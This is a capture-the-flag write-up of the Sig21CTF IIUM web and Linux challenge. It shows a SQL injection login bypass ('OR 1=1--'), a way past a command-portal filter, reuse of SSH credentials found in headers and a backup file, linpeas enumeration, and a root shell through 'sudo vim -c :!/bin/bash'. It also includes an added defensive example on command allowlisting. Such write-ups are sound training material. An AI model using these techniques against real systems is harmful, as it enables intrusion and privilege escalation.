Web Linux Sig21CTF IIUM

Flag 1.

Navigating to http://sig21ctf:3000, we get a login page. From the question hint, we know that the backend database is MySQL, so the first thing I thought of was SQL injection. Using the payload "OR 1=1--", I was able to bypass the login. Checking the HTTP headers then gives us the flag.
flag1: sig21CTF{wh0_s4id_1_need_passw0rd_t0_l0g1n}

Flag 2.

After a successful login, we see a command portal, seemingly for the admin to run system commands. Executing ls -lah reveals the contents of the directory.

drwxr-xr-x  1 root root 4.0K Mar 30 11:37 .
drwxr-xr-x  1 root root 4.0K Mar 30 11:26 ..
-rw-r--r--  1 root root  612 Mar  3 15:34 dashboard.html
-rwxr-xr-x  1 root root 1.1K Mar 11 14:25 deploy.sh
-rw-r--r--  1 root root   38 Mar 30 11:35 flag2.txt
-rw-r--r--  1 root root  950 Mar  3 15:34 login.html
-rw-r--r--  1 root root 3.8K Mar 30 11:25 login.js
drwxr-xr-x 68 root root 4.0K Mar 30 11:34 node_modules
-rw-r--r--  1 root root  47K Mar  3 15:34 package-lock.json
-rw-r--r--  1 root root  359 Mar  3 15:34 package.json
drwxr-xr-x  2 root root 4.0K Mar  3 15:34 static
-rwxr-xr-x  1 root root  158 Mar 30 11:37 wrapper.sh

Now it's clear that we need to read the file flag2.txt. I tried using cat, but it doesn't work, so I just used tac instead.
flag2: sig21CTF{n0t_0nl7_c4t_c4n_v13w_f1l3s}
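
An added example, not part of the original write-up or the challenge's code: assuming the portal rejected `cat` by program name (the page does not show how the filter worked), it shows why such a denylist still accepts `tac`, beside an allowlist of fixed server-side actions run without a shell. The action names and binary paths are hypothetical.

```javascript
// Added example: constructed logic, not the challenge's real filter or wrapper.sh.

// Weak (assumed behaviour of the portal): reject requests whose program name
// is on a denylist, then hand everything else to a shell.
const DENYLIST = new Set(['cat']);

function denylistAllows(commandLine) {
  const program = commandLine.trim().split(/\s+/)[0];
  return !DENYLIST.has(program);
}

// Hardened: the client sends only an action name. The program path and its
// arguments are fixed on the server (hypothetical actions and paths).
const ACTIONS = new Map([
  ['list-files', { file: '/bin/ls', args: ['-lah'] }],
  ['disk-usage', { file: '/bin/df', args: ['-h'] }],
]);

function resolveAction(name) {
  const action = ACTIONS.get(name);
  // Return a copy so callers cannot mutate the server-side table.
  return action ? { file: action.file, args: [...action.args] } : null;
}

// Runs an allowlisted action with execFile: no shell, so no metacharacters,
// pipes or substitutions are ever interpreted.
async function runAction(name) {
  const action = resolveAction(name);
  if (!action) throw new Error(`unknown action: ${JSON.stringify(name)}`);
  const { execFile } = await import('node:child_process');
  return new Promise((resolve, reject) => {
    execFile(action.file, action.args, { timeout: 5000 }, (err, stdout) =>
      err ? reject(err) : resolve(stdout));
  });
}

// Constructed requests, mirroring the two commands tried in the write-up.
for (const request of ['cat flag2.txt', 'tac flag2.txt', 'list-files']) {
  console.log(request.padEnd(14),
    'denylist:', denylistAllows(request) ? 'allowed' : 'blocked',
    '| allowlist:', resolveAction(request) ? 'allowed' : 'blocked');
}
```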

Flag 3.

Looking at the HTTP header content from earlier, I noticed SSH credentials: sshuser:qP9jjbYeWzf7zs9t:2222. Using them gives us SSH access to the machine, and we simply got the flag in sshuser's home directory.
flag3: sig21CTF{1_though7_1t_w4s_s3cur3d_t0_st0r3_th3_55h_k3y5_h3r3}

Flag 4.

Downloading linpeas.sh and running it, we easily find the passwd.bak file.
Now we have another user's credentials. Logging in as abu, we can see the flag in his home directory.

cat /opt/.passwd.bak
abu:WZd8gvSakFFUL8Me8gza
su abu && cd && cat flag_4.txt
flag4: sig21CTF{643628b8b7e514bb557211424e3796f4

Flag 5.

Running linpeas again as user abu, we find that we can actually run /usr/bin/vim as root.
Time to visit GTFOBins.

sudo vim -c ':!/bin/bash'
&& cd && cat flag_5.txt
flag5: sig21CTF{y0u_ju5t_g0tt4_l34rn_5tuff_0n_y0ur_0wn}

The above command starts vim and uses -c to execute the command :!/bin/bash. Since vim is running as root via sudo, the shell it spawns keeps root privileges.

Flag 6.

Checking the hint, we can see that /etc was emphasized. So I just ran a simple grep command on /etc, searching for anything in the flag format, and luckily enough we found something.

grep -R 'sig21CTF{.*}' /etc/ 2>/dev/null
/etc/ssh/sshd_config:# flag6: sig21CTF{52eaf68fadf470e9c993efb54a26ba35} 

CONCLUSION

We started with a simple SQL injection and eventually moved on to pwning the machine and becoming root, using various misconfigurations along the way. Enumeration is the key: without it we could not have found abu's password or seen the misconfiguration on /usr/bin/vim. Finding that password was our first step toward becoming root.

Thanks, and I hope this helps :)

This post is licensed under CC BY 4.0 by the author.